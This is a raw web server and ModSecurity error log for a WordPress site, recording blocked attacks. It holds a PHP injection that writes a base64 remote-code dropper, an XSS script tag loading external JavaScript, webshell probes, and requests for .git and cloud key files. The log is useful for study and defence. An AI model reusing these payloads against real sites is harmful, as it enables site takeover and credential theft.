140111941388032] [client 38.252.239.77:59350] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:css: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdo..."] [severity "CRITI [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z86vSgkGKb1H8DyEYxSJsgAAAJc"], referer: http://investigacionperu.com [Mon Mar 10 04:22:19.621410 2025] [:error] [pid 21517:tid 140111932995328] [client 38.252.239.77:59354] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:js. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:js: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z86vS05s3stZftiM6zX32gAAANg"], referer: http://investigacionperu.com [Mon Mar 10 04:22:21.241021 2025] [:error] [pid 21517:tid 140111966566144] [client 38.252.239.77:59358] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:js. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:js: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z86vTU5s3stZftiM6zX32wAAANQ"], referer: http://investigacionperu.com [Mon Mar 10 04:22:22.853596 2025] [:error] [pid 21076:tid 140111932995328] [client 38.252.239.77:59362] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:wp. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:wp: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "Z86vTgkGKb1H8DyEYxSJtAAAAJg"], referer: http://investigacionperu.com [Mon Mar 10 04:22:24.440270 2025] [:error] [pid 21074:tid 140111941388032] [client 38.252.239.77:59366] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:wp. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:wp: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "Z86vUGMaS9E_uya37I8KGgAAABc"], referer: http://investigacionperu.com [Mon Mar 10 09:44:33.636438 2025] [:error] [pid 21075:tid 140112033707776] [client 179.43.191.19:36286] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://wplicense.org/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://wplicense.org/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Z8760ULc9Mvpatm89I8zAAAAAEw"], referer: https://investigacionperu.com [Mon Mar 10 09:56:32.385232 2025] [autoindex:error] [pid 21074:tid 140111974958848] [client 74.225.136.71:37372] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Mar 10 09:58:26.668141 2025] [:error] [pid 21074:tid 140112084064000] [client 194.5.82.17:37680] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php:69 [Mon Mar 10 09:58:26.668216 2025] [:error] [pid 21074:tid 140112084064000] [client 194.5.82.17:37680] Stack trace: [Mon Mar 10 09:58:26.668230 2025] [:error] [pid 21074:tid 140112084064000] [client 194.5.82.17:37680] #0 {main} [Mon Mar 10 09:58:26.668336 2025] [:error] [pid 21074:tid 140112084064000] [client 194.5.82.17:37680] thrown in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php on line 69 [Mon Mar 10 09:58:42.631480 2025] [autoindex:error] [pid 32347:tid 140111949780736] [client 194.5.82.17:37726] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Mon Mar 10 09:58:50.597085 2025] [autoindex:error] [pid 21074:tid 140112008529664] [client 194.5.82.17:37752] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Mon Mar 10 09:59:03.842095 2025] [autoindex:error] [pid 32391:tid 140112206399232] [client 194.5.82.17:37798] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Mon Mar 10 09:59:12.828279 2025] [autoindex:error] [pid 21075:tid 140112008529664] [client 194.5.82.17:37842] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 10 09:59:15.420108 2025] [autoindex:error] [pid 21075:tid 140111932995328] [client 194.5.82.17:37852] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Mon Mar 10 09:59:34.527402 2025] [autoindex:error] [pid 21074:tid 140112084064000] [client 194.5.82.17:37904] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Mon Mar 10 09:59:35.268154 2025] [:error] [pid 21074:tid 140112067278592] [client 194.5.82.17:37906] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Mon Mar 10 09:59:38.371651 2025] [autoindex:error] [pid 21075:tid 140111966566144] [client 194.5.82.17:37916] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Mon Mar 10 09:59:41.284583 2025] [autoindex:error] [pid 21517:tid 140112008529664] [client 194.5.82.17:37926] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Mon Mar 10 10:00:01.261818 2025] [autoindex:error] [pid 21074:tid 140111941388032] [client 194.5.82.17:37990] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Mon Mar 10 10:00:11.326599 2025] [autoindex:error] [pid 21074:tid 140112075671296] [client 194.5.82.17:38020] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Mon Mar 10 10:00:16.544707 2025] [autoindex:error] [pid 32347:tid 140111932995328] [client 194.5.82.17:38032] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Mon Mar 10 10:00:22.657499 2025] [autoindex:error] [pid 21074:tid 140111941388032] [client 194.5.82.17:38060] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Mon Mar 10 10:00:24.562537 2025] [autoindex:error] [pid 21074:tid 140112058885888] [client 194.5.82.17:38068] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Mon Mar 10 10:00:28.264406 2025] [:error] [pid 21074:tid 140112042100480] [client 194.5.82.17:38078] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Mar 10 10:00:55.952179 2025] [autoindex:error] [pid 21074:tid 140112050493184] [client 194.5.82.17:38184] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Mon Mar 10 10:01:03.513974 2025] [autoindex:error] [pid 21075:tid 140111966566144] [client 194.5.82.17:38214] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Mon Mar 10 10:01:19.890527 2025] [autoindex:error] [pid 21517:tid 140111983351552] [client 194.5.82.17:38268] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 10 10:01:34.449119 2025] [autoindex:error] [pid 21074:tid 140112189613824] [client 194.5.82.17:38312] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Mon Mar 10 10:01:54.093666 2025] [:error] [pid 21076:tid 140112025315072] [client 194.5.82.17:38376] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Mar 10 10:01:55.656119 2025] [autoindex:error] [pid 32392:tid 140111941388032] [client 194.5.82.17:38384] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Mon Mar 10 10:02:17.497027 2025] [:error] [pid 21074:tid 140111949780736] [client 194.5.82.17:38452] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Mar 10 10:02:38.814349 2025] [:error] [pid 21074:tid 140112181221120] [client 194.5.82.17:38528] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Mon Mar 10 10:02:59.308067 2025] [autoindex:error] [pid 21074:tid 140112084064000] [client 194.5.82.17:38604] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Mon Mar 10 10:03:50.006122 2025] [:error] [pid 21074:tid 140112042100480] [client 194.5.82.17:38762] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Mar 10 12:36:33.233971 2025] [authz_core:error] [pid 21074:tid 140112206399232] [client 146.190.242.161:44606] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/10 12:36:37 [error] 21033#21033: *218781 access forbidden by rule, client: 146.190.242.161, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Mar 10 14:21:28.078844 2025] [authz_core:error] [pid 32391:tid 140112042100480] [client 46.101.111.185:46858] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/10 14:21:34 [error] 21033#21033: *219877 access forbidden by rule, client: 46.101.111.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Mar 10 19:17:57.520766 2025] [:error] [pid 21075:tid 140112050493184] [client 193.41.206.202:51754] [client 193.41.206.202] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_profiler/phpinfo.bak"] [unique_id "Z8-BNULc9Mvpatm89I818gAAAEo"] [Mon Mar 10 19:18:52.020102 2025] [:error] [pid 21074:tid 140112058885888] [client 193.41.206.202:51774] [client 193.41.206.202] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/etc/gcp/gce.conf"] [unique_id "Z8-BbGMaS9E_uya37I8Q2QAAAAk"] [Mon Mar 10 19:18:54.919061 2025] [:error] [pid 32391:tid 140112084064000] [client 193.41.206.202:51776] [client 193.41.206.202] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/etc/gcp/gce.key"] [unique_id "Z8-BbvIGLh_7T-dJMyw6ngAAAUY"] [Mon Mar 10 19:36:10.746243 2025] [autoindex:error] [pid 21074:tid 140111941388032] [client 64.227.143.222:51998] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2025/03/10 21:55:23 [error] 21033#21033: *223527 access forbidden by rule, client: 159.223.104.249, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/10 21:55:23 [error] 21033#21033: *223527 access forbidden by rule, client: 159.223.104.249, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/11 01:51:55 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:51:56 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/COMMIT_EDITMSG HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:00 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/FETCH_HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:02 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:03 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/ORIG_HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/11 01:52:05 [error] 21033#21033: *225756 access forbidden by rule, client: 193.41.206.138, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 